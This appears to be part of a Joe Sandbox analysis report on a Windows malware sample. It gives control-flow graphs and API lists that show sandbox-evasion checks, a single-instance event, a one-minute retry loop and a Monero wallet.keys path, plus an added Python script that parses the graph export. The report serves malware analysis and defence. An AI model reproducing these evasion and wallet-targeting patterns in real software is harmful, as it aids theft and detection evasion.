                      914    7456c5-745719   911          call 74a820; call 74a7a0; call 731590; call 7451f0; call 74a8a0; call 74a800
                      915    74571e-745793   911, 1018    call 74a740 * 2; call 731590; call 7452c0; call 74a8a0; call 74a800; call 74aad0; StrCmpCA
                      1018   745795-7457d5   911          call 74a7a0; call 731590; call 7451f0; call 74a8a0; call 74a800
                      911    7457da-74585f   929, 930     call 74aad0; StrCmpCA
                      907    7457dc-745844   1039         call 74a8a0; call 74a820 * 2; call 731670; call 74a800 * 4; call 746560; call 731550
                      929    745865-74586c   936, 937
                      936    745872-745879   943, 944
                      944    74587b-7458ce   937          call 74a820; call 74a7a0; call 731590; call 7451f0; call 74a8a0; call 74a800
                      943    7458d3-745948   937, 1042    call 74a740 * 2; call 731590; call 7452c0; call 74a8a0; call 74a800; call 74aad0; StrCmpCA
                      1042   74594a-74598a   937          call 74a7a0; call 731590; call 7451f0; call 74a8a0; call 74a800
                      937    74598f-745a14   966, 967     call 74aad0; StrCmpCA
                      930    745991-7459f9   1039         call 74a8a0; call 74a820 * 2; call 731670; call 74a800 * 4; call 746560; call 731550
                      966    745a16-745a21   874          Sleep
                      967    745a28-745a91   1039         call 74a8a0; call 74a820 * 2; call 731670; call 74a800 * 4; call 746560; call 731550
                      1039   745ac3-745ac6   exit
                      Reading: block 874 heads a loop. Three similar stages follow (875/891 or 876/906 into the compare at 902; 914 or 915/1018 into the compare at 911; 944 or 943/1042 into the compare at 937), each ending in a StrCmpCA against ERROR. From the compares at 902 and 911 one outcome leaves through 907 or 930 to the exit block 1039; from the final compare at 937 one outcome runs through 967 to the exit and the other through 966, Sleep(0000EA60) = 60 000 ms, back to 874, so the whole three-stage exchange is repeated after a one-minute pause rather than abandoned. The export gives overlapping address ranges for 907/911 and for 930/937; they are reproduced here as exported.
                      APIs
                        • Part of subcall function 0074A820: lstrlen.KERNEL32(00734F05,?,?,00734F05,00750DDE), ref: 0074A82B
                        • Part of subcall function 0074A820: lstrcpy.KERNEL32(00750DDE,00000000), ref: 0074A885
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745644
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007456A1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745857
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745228
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 007452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745318
                        • Part of subcall function 007452C0: lstrlen.KERNEL32(00000000), ref: 0074532F
                        • Part of subcall function 007452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00745364
                        • Part of subcall function 007452C0: lstrlen.KERNEL32(00000000), ref: 00745383
                        • Part of subcall function 007452C0: lstrlen.KERNEL32(00000000), ref: 007453AE
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0074578B
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00745940
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00745A0C
                      • Sleep.KERNEL32(0000EA60), ref: 00745A1B
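Joe Sandbox exports control_flow_graph data as one flat token stream: a block id with its address range, call entries with optional * N repeat counts, and a->b edges. Read as text it hides the one thing worth knowing about this function, whether the Sleep and the ERROR compares sit on a loop. The Python below is an added example, not anything from the report or the sample: it parses that stream (GRAPH is the export line for this function, copied from the report) and reports the backward jump that closes each loop together with the Windows APIs called on it. It assumes only the token forms that line actually contains.

```python
"""Parse the flat control_flow_graph line Joe Sandbox exports and find its loops.

Added example, not part of the report: GRAPH is the export line for the
function at 745510, copied from the report; parser and loop analysis are new
code for this page.  Token forms handled (the ones the export line contains):
    <id> <start>-<end>      a basic block, addresses in hex
    call <addr> [* N]       N calls to an internal function at addr
    <ApiName> [* N]         N calls to a named Windows API
    <a>-><b>                a control-flow edge from block a to block b
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

GRAPH = (
    "control_flow_graph 858 745510-745577 call 745ad0 call 74a820 * 3 call 74a740 * 4 "
    "874 74557c-745583 858->874 875 745585-7455b6 call 74a820 call 74a7a0 call 731590 "
    "call 7451f0 874->875 876 7455d7-74564c call 74a740 * 2 call 731590 call 7452c0 "
    "call 74a8a0 call 74a800 call 74aad0 StrCmpCA 874->876 891 7455bb-7455d2 call 74a8a0 "
    "call 74a800 875->891 902 745693-7456a9 call 74aad0 StrCmpCA 876->902 906 74564e-74568e "
    "call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 876->906 891->902 "
    "907 7457dc-745844 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 "
    "call 731550 902->907 908 7456af-7456b6 902->908 906->902 1039 745ac3-745ac6 907->1039 "
    "910 7456bc-7456c3 908->910 911 7457da-74585f call 74aad0 StrCmpCA 908->911 "
    "914 7456c5-745719 call 74a820 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 "
    "910->914 915 74571e-745793 call 74a740 * 2 call 731590 call 7452c0 call 74a8a0 call 74a800 "
    "call 74aad0 StrCmpCA 910->915 929 745865-74586c 911->929 930 745991-7459f9 call 74a8a0 "
    "call 74a820 * 2 call 731670 call 74a800 * 4 call 746560 call 731550 911->930 914->911 "
    "915->911 1018 745795-7457d5 call 74a7a0 call 731590 call 7451f0 call 74a8a0 call 74a800 "
    "915->1018 936 745872-745879 929->936 937 74598f-745a14 call 74aad0 StrCmpCA 929->937 "
    "930->1039 943 7458d3-745948 call 74a740 * 2 call 731590 call 7452c0 call 74a8a0 "
    "call 74a800 call 74aad0 StrCmpCA 936->943 944 74587b-7458ce call 74a820 call 74a7a0 "
    "call 731590 call 7451f0 call 74a8a0 call 74a800 936->944 966 745a16-745a21 Sleep "
    "937->966 967 745a28-745a91 call 74a8a0 call 74a820 * 2 call 731670 call 74a800 * 4 "
    "call 746560 call 731550 937->967 943->937 1042 74594a-74598a call 74a7a0 call 731590 "
    "call 7451f0 call 74a8a0 call 74a800 943->1042 944->937 966->874 967->1039 1018->911 "
    "1042->937"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")


@dataclass
class Block:
    id: int
    start: int
    end: int
    calls: list = field(default_factory=list)   # [name, count] pairs in call order


def parse_graph(text):
    """Return ({block id: Block}, [(src, dst), ...]) from the export line."""
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        if (m := EDGE_RE.match(t)):
            edges.append((int(m[1]), int(m[2])))
            i += 1
        elif t.isdigit() and i + 1 < len(toks) and (r := RANGE_RE.match(toks[i + 1])):
            cur = Block(int(t), int(r[1], 16), int(r[2], 16))
            blocks[cur.id] = cur
            i += 2
        elif cur is None:
            raise ValueError(f"token {t!r} before any block")
        elif t == "call":                       # internal function call
            cur.calls.append(["call " + toks[i + 1], 1])
            i += 2
        elif t == "*":                          # repeat count for the previous call
            cur.calls[-1][1] = int(toks[i + 1])
            i += 2
        else:                                   # named Windows API
            cur.calls.append([t, 1])
            i += 1
    return blocks, edges


def successors(edges):
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    return succ


def reachable_from(succ, start):
    """All blocks reachable from start by one or more edges."""
    seen, todo = set(), list(succ[start])
    while todo:
        n = todo.pop()
        if n not in seen:
            seen.add(n)
            todo.extend(succ[n])
    return seen


def blocks_on_cycles(blocks, edges):
    succ = successors(edges)
    return {b for b in blocks if b in reachable_from(succ, b)}


def backward_jumps(blocks, edges):
    """Cycle edges that jump to a lower address: the loop back-edges in compiler-laid-out code."""
    on_cycle = blocks_on_cycles(blocks, edges)
    return [(a, b) for a, b in edges
            if a in on_cycle and b in on_cycle and blocks[b].start < blocks[a].start]


def apis_in_loop(blocks, edges):
    """Named Windows APIs called from blocks that lie on a cycle."""
    names = set()
    for b in blocks_on_cycles(blocks, edges):
        names.update(name for name, _ in blocks[b].calls if not name.startswith("call "))
    return sorted(names)


def describe(text):
    """One line per loop: the closing jump and the APIs reachable inside the loop."""
    blocks, edges = parse_graph(text)
    return [f"loop: block {a} ({blocks[a].start:x}) -> block {b} ({blocks[b].start:x}); "
            f"APIs on the loop: {', '.join(apis_in_loop(blocks, edges))}"
            for a, b in backward_jumps(blocks, edges)]


if __name__ == "__main__":
    print("\n".join(describe(GRAPH)))
```

For this function it reports a single backward jump, 966 -> 874: the block that calls Sleep(0000EA60), 60 000 ms, returns to the block at 74557c, so on the branch taken after the last StrCmpCA against ERROR the whole request sequence is repeated once a minute rather than abandoned, and StrCmpCA and Sleep are the only named APIs on the loop. The address-ordering test for back-edges assumes compiler-generated layout, where a loop body sits above its head; for hand-written or obfuscated code use a DFS-based back-edge test instead.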
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen$Sleep
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 507064821-2791005934
                      • Opcode ID: 7c6d5cf5ff25d6644a63b997efea93530a2d18f9e8c00ce3348b15466736b10b
                      • Instruction ID: d939a94f27319c01a19431612def871eeaf27ba9c0049f8f656bcd2899b21e5f
                      • Opcode Fuzzy Hash: 7c6d5cf5ff25d6644a63b997efea93530a2d18f9e8c00ce3348b15466736b10b
                      • Instruction Fuzzy Hash: 21E11172950104EBEB15FBB0DC9AAED737CAF94300F508528B51666192EF3C6B4DCB92

                      Control-flow Graph

                       Basic blocks (node id, address range, calls) and their successor nodes; the executed / not-executed colouring of the rendered graph is not preserved in text.
                       • 1069 7417a0-7417cd call 74aad0 StrCmpCA -> 1072, 1073
                       • 1072 7417d7-7417f1 call 74aad0 -> 1077
                       • 1073 7417cf-7417d1 ExitProcess
                       • 1077 7417f4-7417f8 -> 1078, 1079
                       • 1078 7419c2-7419cd call 74a800
                       • 1079 7417fe-741811 -> 1080, 1081
                       • 1080 741817-74181a -> 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095
                       • 1081 74199e-7419bd -> 1077
                       • 1083 741835-741844 call 74a820 -> 1081
                       • 1084 741970-741981 StrCmpCA -> 1110, 1111
                       • 1085 7418f1-741902 StrCmpCA -> 1101, 1102
                       • 1086 741951-741962 StrCmpCA -> 1107, 1108
                       • 1087 741932-741943 StrCmpCA -> 1105, 1106
                       • 1088 741913-741924 StrCmpCA -> 1103, 1104
                       • 1089 74185d-74186e StrCmpCA -> 1116, 1117
                       • 1090 74187f-741890 StrCmpCA -> 1118, 1119
                       • 1091 741821-741830 call 74a820 -> 1081
                       • 1092 7418ad-7418be StrCmpCA -> 1097, 1098
                       • 1093 7418cf-7418e0 StrCmpCA -> 1099, 1100
                       • 1094 74198f-741999 call 74a820 -> 1081
                       • 1095 741849-741858 call 74a820 -> 1081
                       • 1097 7418c0-7418c3 -> 1098
                       • 1098 7418ca -> 1081
                       • 1099 7418e2-7418e5 -> 1100
                       • 1100 7418ec -> 1081
                       • 1101 741904-741907 -> 1102
                       • 1102 74190e -> 1081
                       • 1103 741926-741929 -> 1104
                       • 1104 741930 -> 1081
                       • 1105 741945-741948 -> 1106
                       • 1106 74194f -> 1081
                       • 1107 741964-741967 -> 1108
                       • 1108 74196e -> 1081
                       • 1110 741983-741986 -> 1111
                       • 1111 74198d -> 1081
                       • 1116 741870-741873 -> 1117
                       • 1117 74187a -> 1081
                       • 1118 741892-74189c -> 1120
                       • 1119 74189e-7418a1 -> 1120
                       • 1120 7418a8 -> 1081
                      APIs
                      • StrCmpCA.SHLWAPI(00000000,block), ref: 007417C5
                      • ExitProcess.KERNEL32 ref: 007417D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                       • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID: block
                      • API String ID: 621844428-2199623458
                      • Opcode ID: 94d1092be3b400f5ffac046df6bd38582b6afa4e2d8d24857470a7047208ad32
                      • Instruction ID: cc1f53164fe7325bf55458bc1520b5839415b28f3eec0c4d8ced6ebb502c2c61
                      • Opcode Fuzzy Hash: 94d1092be3b400f5ffac046df6bd38582b6afa4e2d8d24857470a7047208ad32
                      • Instruction Fuzzy Hash: C8518CB5B1420AEFDB04EFA1D954AFE77B9BF44304F508048E806A7340D778E985DB62

                      Control-flow Graph

                       Basic blocks (node id, address range, calls) and their successor nodes; the executed / not-executed colouring of the rendered graph is not preserved in text.
                       • 1124 747500-74754a GetWindowsDirectoryA -> 1125, 1126
                       • 1125 747553-7475c7 GetVolumeInformationA call 748d00 * 3 -> 1133
                       • 1126 74754c -> 1125
                       • 1133 7475d8-7475df -> 1134, 1135
                       • 1134 7475e1-7475fa call 748d00 -> 1133
                       • 1135 7475fc-747617 GetProcessHeap RtlAllocateHeap -> 1137, 1138
                       • 1137 747628-747658 wsprintfA call 74a740 -> 1145
                       • 1138 747619-747626 call 74a740 -> 1145
                       • 1145 74767e-74768e
                      APIs
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00747542
                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0074757F
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747603
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0074760A
                      • wsprintfA.USER32 ref: 00747640
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                       • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                      • String ID: :$C$\$u
                      • API String ID: 1544550907-2991394348
                      • Opcode ID: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
                      • Instruction ID: 23b634493e773334394aa06b5a73aa5c6b395422f22b088f494553b94769600f
                      • Opcode Fuzzy Hash: 1aaa221617ebd7d13cdb5689b00eab069ca6bbbf3411f64960102b5abaab6e1a
                      • Instruction Fuzzy Hash: 8D4182B1D04248EBDB14DF94DC49BEEBBB8EF48704F104199F5096B280D7786A84CFA6

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0750), ref: 007498A1
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0798), ref: 007498BA
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0618), ref: 007498D2
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0630), ref: 007498EA
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0558), ref: 00749903
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E8940), ref: 0074991B
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013D66A0), ref: 00749933
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013D6720), ref: 0074994C
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0810), ref: 00749964
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E07B0), ref: 0074997C
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E0570), ref: 00749995
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E07C8), ref: 007499AD
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013D68A0), ref: 007499C5
                        • Part of subcall function 00749860: GetProcAddress.KERNEL32(75900000,013E07F8), ref: 007499DE
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 007311D0: ExitProcess.KERNEL32 ref: 00731211
                        • Part of subcall function 00731160: GetSystemInfo.KERNEL32(?), ref: 0073116A
                        • Part of subcall function 00731160: ExitProcess.KERNEL32 ref: 0073117E
                        • Part of subcall function 00731110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0073112B
                        • Part of subcall function 00731110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00731132
                        • Part of subcall function 00731110: ExitProcess.KERNEL32 ref: 00731143
                        • Part of subcall function 00731220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
                        • Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731258
                        • Part of subcall function 00731220: __aulldiv.LIBCMT ref: 00731266
                        • Part of subcall function 00731220: ExitProcess.KERNEL32 ref: 00731294
                        • Part of subcall function 00746770: GetUserDefaultLangID.KERNEL32 ref: 00746774
                        • Part of subcall function 00731190: ExitProcess.KERNEL32 ref: 007311C6
                        • Part of subcall function 00747850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                        • Part of subcall function 00747850: RtlAllocateHeap.NTDLL(00000000), ref: 00747887
                        • Part of subcall function 00747850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                        • Part of subcall function 007478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00747910
                        • Part of subcall function 007478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00747917
                        • Part of subcall function 007478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0074792F
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00746AF9
                      • Sleep.KERNEL32(00001770), ref: 00746B04
                      • CloseHandle.KERNEL32(?,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
                      • ExitProcess.KERNEL32 ref: 00746B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                       • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 799ce390292224180788967c2b99f277ce9a4cd2f72c1e1a84d2cf68fbcc6220
                      • Instruction ID: 3c962c896f51c683667334b0e0a514eb7053d6094ae2cee60751391bf8477403
                      • Opcode Fuzzy Hash: 799ce390292224180788967c2b99f277ce9a4cd2f72c1e1a84d2cf68fbcc6220
                      • Instruction Fuzzy Hash: F1312B71A54208FAEB05FBF0DC5ABFE7778AF44301F504528F612A2192DF786945C6A2

                      Control-flow Graph

                       Basic blocks (node id, address range, calls) and their successor nodes; the executed / not-executed colouring of the rendered graph is not preserved in text.
                       • 1204 731220-731247 call 7489b0 GlobalMemoryStatusEx -> 1207, 1208
                       • 1207 731273-73127a -> 1209
                       • 1208 731249-731271 call 74da00 * 2 -> 1209
                       • 1209 731281-731285 -> 1212, 1213
                       • 1212 731287 -> 1215, 1216
                       • 1213 73129a-73129d
                       • 1215 731292-731294 ExitProcess
                       • 1216 731289-731290 -> 1213, 1215
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0073123E
                      • __aulldiv.LIBCMT ref: 00731258
                      • __aulldiv.LIBCMT ref: 00731266
                      • ExitProcess.KERNEL32 ref: 00731294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                       • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
                      • Instruction ID: 09b175ffe8ae989d59285de05c75f9a5f4d4f98636c2d294dc9a01ef0cc37a9c
                      • Opcode Fuzzy Hash: 0de3474a3a94c2950dfc23839dde7378338412f4c76bca19ada8c88e6b523c11
                      • Instruction Fuzzy Hash: 05011DB0E44308FAEB10EFE4CC49BAEBB78BB54705F608048E705B62C2D77859458799

                      Control-flow Graph

                       Basic blocks (node id, address range, calls) and their successor nodes; the executed / not-executed colouring of the rendered graph is not preserved in text.
                       • 1218 746af3 -> 1219
                       • 1219 746b0a -> 1221, 1222
                       • 1221 746b0c-746b22 call 746920 call 745b10 CloseHandle ExitProcess
                       • 1222 746aba-746ad7 call 74aad0 OpenEventA -> 1227, 1228
                       • 1227 746af5-746b04 CloseHandle Sleep -> 1219
                       • 1228 746ad9-746af1 call 74aad0 CreateEventA -> 1221
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00746AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00746AF9
                      • Sleep.KERNEL32(00001770), ref: 00746B04
                      • CloseHandle.KERNEL32(?,00000000,?,013E8880,?,0075110C,?,00000000,?,00751110,?,00000000,00750AEF), ref: 00746B1A
                      • ExitProcess.KERNEL32 ref: 00746B22
                      Memory Dump Source
